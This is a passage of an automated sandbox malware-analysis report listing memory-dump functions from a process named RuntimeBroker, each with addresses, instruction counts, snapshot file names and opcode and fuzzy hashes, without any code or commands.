                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 74538833cb7ec79eacf6f377aa16d629ce8f24b7635502282713a666ab98b47b
                                                                                                                                      • Instruction ID: 0c9d17f9deb7a68100be0d1935eb2a291519735cbe80323f1674b01c8294f7bc
                                                                                                                                      • Opcode Fuzzy Hash: 74538833cb7ec79eacf6f377aa16d629ce8f24b7635502282713a666ab98b47b
                                                                                                                                      • Instruction Fuzzy Hash: FA11F670E0951D8EDBA4EB98C4687FCB7A1EB4D300F50417AD00DE2291CB342AA18F45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B896E61 Relevance: .0, Instructions: 47COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b894000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7fd12cc5ec0d0168b22dd9a52701ea8358734ddb26e9c92e6e744e7764f92306
                                                                                                                                      • Instruction ID: 7a6fa9905f4e44543e29366a2969c39baa6a3bf13af353baf42f8cee324a9012
                                                                                                                                      • Opcode Fuzzy Hash: 7fd12cc5ec0d0168b22dd9a52701ea8358734ddb26e9c92e6e744e7764f92306
                                                                                                                                      • Instruction Fuzzy Hash: 84014470A1968C8FCF85EF18C895AD93BF0FF19304F0501AAE848C3261DB34E950CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B897355 Relevance: .0, Instructions: 46COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b894000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 35172419fc182df2dfd9ad9c87f61a9739c03fddc7ad051f99e9d599b48a814e
                                                                                                                                      • Instruction ID: c5eaccce5b8d736a262c8273d50f5a3673ec1fa62866a38663b0d1f7ac4e1151
                                                                                                                                      • Opcode Fuzzy Hash: 35172419fc182df2dfd9ad9c87f61a9739c03fddc7ad051f99e9d599b48a814e
                                                                                                                                      • Instruction Fuzzy Hash: C9017834909A8DCFCF54DF1888525E93BF0FF68740F4102AAE848C7291D738E654CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B880C50 Relevance: .0, Instructions: 42COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b880000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 11a4b6e7eec11c049b54d652e8c15d78112014800c0d597ba3bb8d2560c48f6f
                                                                                                                                      • Instruction ID: 2cbdd16fece958d0dfc0cffb74611a3d309c18432fd8d361b3aaa649d8f25359
                                                                                                                                      • Opcode Fuzzy Hash: 11a4b6e7eec11c049b54d652e8c15d78112014800c0d597ba3bb8d2560c48f6f
                                                                                                                                      • Instruction Fuzzy Hash: 0801F571E0E68E8FE7129BA4C8242EE77B1EF46310F0641B3D421DB1E6DA382A18C741
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CC2C9 Relevance: .0, Instructions: 41COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6e3e8f2723d3ee86a83ef16725ef6eca99e20160e926cfb7f6a601edc81fe28f
                                                                                                                                      • Instruction ID: ff26f1d82fbe2db0ca0924a9f670352958baa6b01d9e01e0a803715f8031b9c4
                                                                                                                                      • Opcode Fuzzy Hash: 6e3e8f2723d3ee86a83ef16725ef6eca99e20160e926cfb7f6a601edc81fe28f
                                                                                                                                      • Instruction Fuzzy Hash: AE01D47090968D8FDB55EF6488692A97BB0FF19300F4505FBE40CC71A2DA389584CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CECF9 Relevance: .0, Instructions: 41COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4ed2b39ea08d3d677964ef13ddd6d378471464c24b3468ea4d2ac87a5759515f
                                                                                                                                      • Instruction ID: 78091d3a527ecf9c48b757bd3757e656d2a96115e4d68395ec051c19f387c09b
                                                                                                                                      • Opcode Fuzzy Hash: 4ed2b39ea08d3d677964ef13ddd6d378471464c24b3468ea4d2ac87a5759515f
                                                                                                                                      • Instruction Fuzzy Hash: 610192B190968D8FEB56EF6888692A97FF0FF29201F4905EBD508C61A2D6389544CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CC25D Relevance: .0, Instructions: 40COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5a96fc725eb85afc5c0684234b9746260c445ed3c0742d589c1b54d16a4b38a3
                                                                                                                                      • Instruction ID: 65ec40b737976c6557684a38af57fb73d333537356491900b4def57312f5f1dd
                                                                                                                                      • Opcode Fuzzy Hash: 5a96fc725eb85afc5c0684234b9746260c445ed3c0742d589c1b54d16a4b38a3
                                                                                                                                      • Instruction Fuzzy Hash: 5201D67090564E8FEB94EF6888596E97BF0FF28300F8445B7E40CC61A1EE389294CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CF2D3 Relevance: .0, Instructions: 40COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6e6f5e5f975ca6d5b017e9c385d1077939def9dd14460ba192c74861aa11c080
                                                                                                                                      • Instruction ID: cc41fccc5eee980828cbd7207e3989dc2a1e812c7e12d78f5379edc60b5bdaa9
                                                                                                                                      • Opcode Fuzzy Hash: 6e6f5e5f975ca6d5b017e9c385d1077939def9dd14460ba192c74861aa11c080
                                                                                                                                      • Instruction Fuzzy Hash: 7EF0FF3085E6C8AFDB02AB708C686E97FF0EF56304F4A85E7E458C60A2D62C5658C752
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CC671 Relevance: .0, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 468d883320a4118a7b0c64abc3a0719d4d9432293d59226644dfbf23bcd94939
                                                                                                                                      • Instruction ID: 8a9e91f8de9334f9f2a986da5e238bddab8e40a765d6fbb51764a20fdfd14768
                                                                                                                                      • Opcode Fuzzy Hash: 468d883320a4118a7b0c64abc3a0719d4d9432293d59226644dfbf23bcd94939
                                                                                                                                      • Instruction Fuzzy Hash: 93F0F6B190968D8FEB55EF6488256E97BA0FF14200F0501F7F81CC31E2DA389651CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CED69 Relevance: .0, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8100577cb69015dce602efe059567ffd6a7d63c622fb6b01cf6b43f8b3be0f80
                                                                                                                                      • Instruction ID: ce45c6d76414d33c623f3a66cc4920343469bcd2408c38b68f028f215e0eada7
                                                                                                                                      • Opcode Fuzzy Hash: 8100577cb69015dce602efe059567ffd6a7d63c622fb6b01cf6b43f8b3be0f80
                                                                                                                                      • Instruction Fuzzy Hash: 2DF0A9B190E7C94FDB666B644C721A43FA0FF56200F0A01FBE55CC65E3EA596554C342
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CEC8D Relevance: .0, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 308753c81c4ed24580bccfe1f6015ce5aac6ea675fe2e557f54a78506b5b64e3
                                                                                                                                      • Instruction ID: f54a7f6c8cc12be5e3c624929d6bd529201828ddeb39b2a10fb2df8d6cfc20ab
                                                                                                                                      • Opcode Fuzzy Hash: 308753c81c4ed24580bccfe1f6015ce5aac6ea675fe2e557f54a78506b5b64e3
                                                                                                                                      • Instruction Fuzzy Hash: 4501A77091568D8FDB55EF6484596A97BF0FF28301F4545B7E41CC21A2DA389154CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CFF4A Relevance: .0, Instructions: 38COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8a6ad6568c7bc38a09d21061d46d7cfff981c6ae0c56378288dc2a5bc0408384
                                                                                                                                      • Instruction ID: 3466f11cdf8467c1bd1df4598e5300f4779a325c59ab5fa8b8011f82120cc196
                                                                                                                                      • Opcode Fuzzy Hash: 8a6ad6568c7bc38a09d21061d46d7cfff981c6ae0c56378288dc2a5bc0408384
                                                                                                                                      • Instruction Fuzzy Hash: F9012931A1850D8BEB28EF84C894BBDB7B1FF58310F654176D40997295DF38AA868B80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8C40C9 Relevance: .0, Instructions: 38COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7095cc7f374979e24623bfe24995d493e946eba813fab6c47190232b2df4ab49
                                                                                                                                      • Instruction ID: e8223933e4b58500a1fa8c459c32049b07d46802e10036b51b581d7459f2ef9c
                                                                                                                                      • Opcode Fuzzy Hash: 7095cc7f374979e24623bfe24995d493e946eba813fab6c47190232b2df4ab49
                                                                                                                                      • Instruction Fuzzy Hash: 5B01FB7091868D8FDB91EF68C959A993BF0FF69300F4501E7E418C7262D634D554CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8962AD Relevance: .0, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b894000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 68bdaf57649ca22d51fe4242983e082807ee769a617484e3abba64688ad8c2dc
                                                                                                                                      • Instruction ID: 97dd3f907e22862dc1ec1384590def3c0e1e7a5c2525b5200195e096127bc343
                                                                                                                                      • Opcode Fuzzy Hash: 68bdaf57649ca22d51fe4242983e082807ee769a617484e3abba64688ad8c2dc
                                                                                                                                      • Instruction Fuzzy Hash: BEF06D7090968E8FCF92DF58C895A993BA0FF69340F0502AAE41CC71A2D774E964CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CA840 Relevance: .0, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 60bae05c0302a89914e7ee31527e6c0289d33a050aff16ef0ae9b28cf77e37d9
                                                                                                                                      • Instruction ID: 67814f8608110dbd8af8a14e58ad2d40f419479488908825857ada116beaab6e
                                                                                                                                      • Opcode Fuzzy Hash: 60bae05c0302a89914e7ee31527e6c0289d33a050aff16ef0ae9b28cf77e37d9
                                                                                                                                      • Instruction Fuzzy Hash: CFF068B090464E9FEB55FF6884596F977E0FF28301F5005B7E81CC25A1DA346190CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CC529 Relevance: .0, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 24e715e62a13d92274e501c17007d8ef2a6f7254b2d8ca4818237574fde6fbe4
                                                                                                                                      • Instruction ID: 024fe9052e7497a436231e6f6d3c1961b2c317edd63609164fa037ddf95308d8
                                                                                                                                      • Opcode Fuzzy Hash: 24e715e62a13d92274e501c17007d8ef2a6f7254b2d8ca4818237574fde6fbe4
                                                                                                                                      • Instruction Fuzzy Hash: DCF0CDB190E7C94FE7669B644C791A43FA0FF56300F0A05EBE45CC71E3D9199954C742
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B896ACD Relevance: .0, Instructions: 35COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b894000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c4b8fa51ff37e57f3634dc13f53e28e0d5192efeb5e579da1f2d2b0ee220b634
                                                                                                                                      • Instruction ID: f0cd4c5949e007dfb337b2a0df2b9340da400600cc0c9508ea392d2325d53a42
                                                                                                                                      • Opcode Fuzzy Hash: c4b8fa51ff37e57f3634dc13f53e28e0d5192efeb5e579da1f2d2b0ee220b634
                                                                                                                                      • Instruction Fuzzy Hash: 25F06D3050A68DCFCF95DF18C865A9A3FE0FF29340F0501A6E418C75A6D734E9A4CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B9C5E Relevance: .0, Instructions: 35COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8B7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8b7000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3c0659d1a750655651227273a03fca603b56d1d7da04e492bf268b4a22c87430
                                                                                                                                      • Instruction ID: c181dff1414412c58870333471d4a10c9ee915101c2f5a4f66a7d5cd1be1f47c
                                                                                                                                      • Opcode Fuzzy Hash: 3c0659d1a750655651227273a03fca603b56d1d7da04e492bf268b4a22c87430
                                                                                                                                      • Instruction Fuzzy Hash: D0F03C3091978D9FDB559F7488685A97FF0FF09204F4544EBD808C61A2D6385554CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B04F9 Relevance: .0, Instructions: 35COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: caa6d35307d06b2c1fa0d38ecfbe9f4d854c3040b0d389d49aa820faf0bc63eb
                                                                                                                                      • Instruction ID: 327074ae39ff5c3e932352623ea41117dcdd2ccab5956ff2ecde4c4049c9bf0b
                                                                                                                                      • Opcode Fuzzy Hash: caa6d35307d06b2c1fa0d38ecfbe9f4d854c3040b0d389d49aa820faf0bc63eb
                                                                                                                                      • Instruction Fuzzy Hash: CA018C7091D78D8FDB56DF2488A9AA97FF0FF19304F4500EBE808C62A6D6389594CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CB2A9 Relevance: .0, Instructions: 34COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d4a519ccbe55d7512d59d07d1c5206337f08c335b0fa52484f93a5d34e9adfef
                                                                                                                                      • Instruction ID: dbb5e94b4afeafcadb94eff081683a56e029ed68a3bbbf9b277fee56d2bd1c39
                                                                                                                                      • Opcode Fuzzy Hash: d4a519ccbe55d7512d59d07d1c5206337f08c335b0fa52484f93a5d34e9adfef
                                                                                                                                      • Instruction Fuzzy Hash: 57F0F67190A68D8FEB11BBA048692F87BB0FF15300F4548F7E41CC21E3ED281144C742
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8C4586 Relevance: .0, Instructions: 33COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6ae73db4bf6b6a96de61e4ff7719a198cd2fe491cf4ba757e732caacda1bf8fc
                                                                                                                                      • Instruction ID: 6a3fcdcc118168ab9e8dd50a9bfbf6e80a42500a7384ab483e3bf5d56a6c505f
                                                                                                                                      • Opcode Fuzzy Hash: 6ae73db4bf6b6a96de61e4ff7719a198cd2fe491cf4ba757e732caacda1bf8fc
                                                                                                                                      • Instruction Fuzzy Hash: 7B01C974A0550CCFEB64EF84C494FA8B7B1FF59315F1541AAD419EB2A1CB75A981CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8BF6B9 Relevance: .0, Instructions: 33COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8BF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BF000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8bf000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 15baac038a7630a855ef6539f1f12b4e5ad98d8bb55e05e30c42eaaae26f34ec
                                                                                                                                      • Instruction ID: 85f7531575dca7c3bd9db09259c4ff976bfd249160a2129fb0209f9e4fb18928
                                                                                                                                      • Opcode Fuzzy Hash: 15baac038a7630a855ef6539f1f12b4e5ad98d8bb55e05e30c42eaaae26f34ec
                                                                                                                                      • Instruction Fuzzy Hash: F3F0AF3090978D8FDB51DF24C8595E97FB0FF1A300F0500ABE818C71A6D6389A94CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B896105 Relevance: .0, Instructions: 32COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b894000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7d93440e5048fd3e368c196328a4e992c301f191f9e29bf1829e9d6fff1e251e
                                                                                                                                      • Instruction ID: 37c4e285f216517c9e48b90ec61dd197cfa2dac02dd6b188a8309e5e7aece153
                                                                                                                                      • Opcode Fuzzy Hash: 7d93440e5048fd3e368c196328a4e992c301f191f9e29bf1829e9d6fff1e251e
                                                                                                                                      • Instruction Fuzzy Hash: 74F08C7194A68D9FDB91ABA488A969D7FB0FF18300F4506BBD448C61A2DA3492948701
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B9D59 Relevance: .0, Instructions: 32COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8B7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8b7000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ba7a33aac57e6146f5394753ba21e76aaae2599dd1161445d612698430a531f6
                                                                                                                                      • Instruction ID: 146f51af0ea56b3cf4e94149412cccdb2974714daba32c4b057c8338e7a27461
                                                                                                                                      • Opcode Fuzzy Hash: ba7a33aac57e6146f5394753ba21e76aaae2599dd1161445d612698430a531f6
                                                                                                                                      • Instruction Fuzzy Hash: 4BF0547191978C9FDB52AF7488686E97FF0FF15200F4604E7E418C71B2DA349654C711
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B89664D Relevance: .0, Instructions: 29COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b894000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 28964c90191565b938429371b6e87b66166db17a513587ea009b5e409a222fcb
                                                                                                                                      • Instruction ID: 0780af3514576b6cf5bdcb99d851e067e45723f2029fbc2018b7df116e2f2530
                                                                                                                                      • Opcode Fuzzy Hash: 28964c90191565b938429371b6e87b66166db17a513587ea009b5e409a222fcb
                                                                                                                                      • Instruction Fuzzy Hash: 14F05C70E4D10A9EDB05DF94A4624FDBB60DF46300F204479D81CD31D7DD3412418681
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8CF692 Relevance: .0, Instructions: 27COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
